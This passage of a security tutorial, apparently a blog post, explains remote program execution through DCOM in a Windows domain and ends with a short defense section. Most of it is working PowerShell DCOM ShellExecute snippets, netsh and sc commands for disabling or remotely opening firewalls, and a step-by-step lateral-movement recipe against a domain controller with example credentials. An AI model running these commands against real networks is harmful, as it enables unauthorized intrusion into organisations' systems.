'9BA05972-F6A8-11CF-A442-00A0C90A8F39'\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$item = $obj.item()\u003Cbr>$item.Document.Application.ShellExecute(\"cmd.exe\",\"\u002Fc calc.exe\",\"c:\\windows\\system32\",$null,0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Client-side view of the process list, the launched calc.exe username is a (same as the currently logged-in username on the Client side), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017480667_4_db64d960b5-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above two methods are applicable to Win7-Win10\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Call 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$obj.Document.Application.ShellExecute(\"cmd.exe\",\"\u002Fc calc.exe\",\"c:\\windows\\system32\",$null,0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is not applicable to Win7, but applicable to Win10 and Server2012 R2\u003C\u002Fp>\u003Ch2>0x03 Practical Exploitation Ideas\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Approach 1: The domain environment does not have the firewall enabled, use directly\u003C\u002Fh3>\u003Cp>Of course, it is necessary to obtain the password of the built-in domain account administrator\u003C\u002Fp>\u003Cp>The method will not be elaborated further\u003C\u002Fp>\u003Ch3>Approach 2: The firewall is enabled by default, modify the local configuration to disable the firewall\u003C\u002Fh3>\u003Cp>In this way, other hosts can remotely operate this host, and can\u003Cstrong>respectively\u003C\u002Fstrong>be achieved through the following methods\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Enable DCOM support by configuring inbound rules\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command line code to open any port is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>DCOM communication ports are dynamically assigned by RPC and are not fixed, so set the inbound port rule to any\u003C\u002Fp>\u003Cp>After adding, the added inbound rule can be found in the firewall advanced features panel, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017490417_5_3da9da8040-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Disable firewall functionality\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The service name corresponding to Windows Firewall is mpssvc. The firewall service can be remotely stopped using the sc command, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc \\\\192.168.0.2 stop mpssvc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, stopping the firewall service does not disable the firewall functionality. The following command is required to disable the firewall functionality:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile state off\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Additional command to enable firewall functionality:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile state on\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Setting inbound rules through firewall profiles\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The default firewall configuration rules are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Block inbound connections that do not match a rule\u003C\u002Fli>\u003Cli>Allow outbound connections that do not match a rule\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017500038_6_a278a5e4b4-1.jpeg\">\u003C\u002Fp>\u003Cp>Modify the rules to allow inbound connections that do not match a rule, using the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After modification, the modified configuration can be viewed through the advanced panel, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017507089_7_265eea3662-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the firewall status triggers an alarm, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017512522_8_65dd3de9b9-1.jpeg\">\u003C\u002Fp>\u003Cp>The command to restore the firewall configuration is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile firewallpolicy blockinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Approach Three: Remotely Modify Firewall Configuration\u003C\u002Fh3>\u003Cp>You can use netsh to remotely configure firewall rules, requiring knowledge of the username and password. Execute the following command with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For the current profile (i.e., the domain profile):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For all profiles, you can use:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set allprofiles settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The error is as follows:\u003C\u002Fp>\u003Cp>`An error occurred while attempting to connect to the remote computer. Make sure\u003C\u002Fp>\u003Cp>that the Windows Firewall service on the remote computer is running and configur\u003C\u002Fp>\u003Cp>ed to allow remote management, and then try your request again.`\u003C\u002Fp>\u003Cp>Indicates that the remote computer does not allow remote management. The following settings are required on the remote computer:\u003C\u002Fp>\u003Cp>\u003Cstrong>Allow Windows Firewall remote management\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Not supported by default. Check the box to enable, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017517713_9_814e28c43a-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This operation can be performed via command line with local administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After enabling this feature, other hosts can remotely manage the local firewall configuration:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017522063_10_b105ba7415-1.jpeg\">\u003C\u002Fp>\u003Cp>In summary, the approach to remotely execute programs on a domain controller using DCOM is as follows:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Obtain domain controller privileges\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Including the password of the built-in administrator account on the domain controller. If the domain controller's firewall is disabled, programs can be executed remotely directly.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If you wish to use other accounts for remote connections, you need to first access COM security via dcomcnfg.exe to activate the user's remote launch and remote activation properties.\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Pre-set backdoor\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If the domain controller's firewall is enabled, DCOM cannot be used directly for remote execution. You need to obtain permission to remotely modify firewall configurations, which can be achieved by enabling Windows Firewall remote management (disabled by default).\u003C\u002Fp>\u003Cp>This operation requires a 3389 connection to the domain controller or using other methods to execute code on the domain controller host, with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Open ports remotely\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use netsh to remotely modify the domain controller's firewall rules to open ports.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>4. Remote execution\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use net use for remote connection, then execute the following PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$item = $obj.item()\u003Cbr>$item.Document.Application.ShellExecute(\"cmd.exe\", \"\u002Fc calc.exe\", \"c:\\\\windows\\\\system32\", $null, 0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When using '9BA05972-F6A8-11CF-A442-00A0C90A8F39', the executing program runs under the currently logged-in user's account.\u003C\u002Fp>\u003Cp>\u003Cstrong>5. Remotely restore domain controller firewall settings\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall Delete rule name=\"any\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>To defend against DCOM remote program execution, simply enable the firewall.\u003C\u002Fp>\u003Cp>You can also disable the built-in Administrator account's remote launch and remote activation permissions for COM. Command as follows:\u003C\u002Fp>\u003Cp>dcomcnfg.exe\u003C\u002Fp>\u003Cp>Open Component Services - My Computer - Properties - COM Security - Launch and Activation Permissions - Edit Default, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017524995_11_eed8b78855-1.jpeg\">\u003C\u002Fp>\u003Cp>Of course, analyzing characteristics through packet capture is also feasible.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the exploitation methods of using DCOM to execute programs, and finally thanks Matt Nelson‏ @enigma0x3 for sharing his article.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1291,"Onedaysec",7,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"DCOM Remote Program Execution: Domain Penetration Techniques & Defense","DCOM, remote execution, domain penetration, lateral movement, MMC20.Application, PowerShell, Win32_DCOMApplication, ExecuteShellCommand, cybersecurity, defense strategies",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],384,383,382,381,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.778Z","2026-07-23T16:01:29.147Z","draft","2026-07-23T16:05:46.526Z"]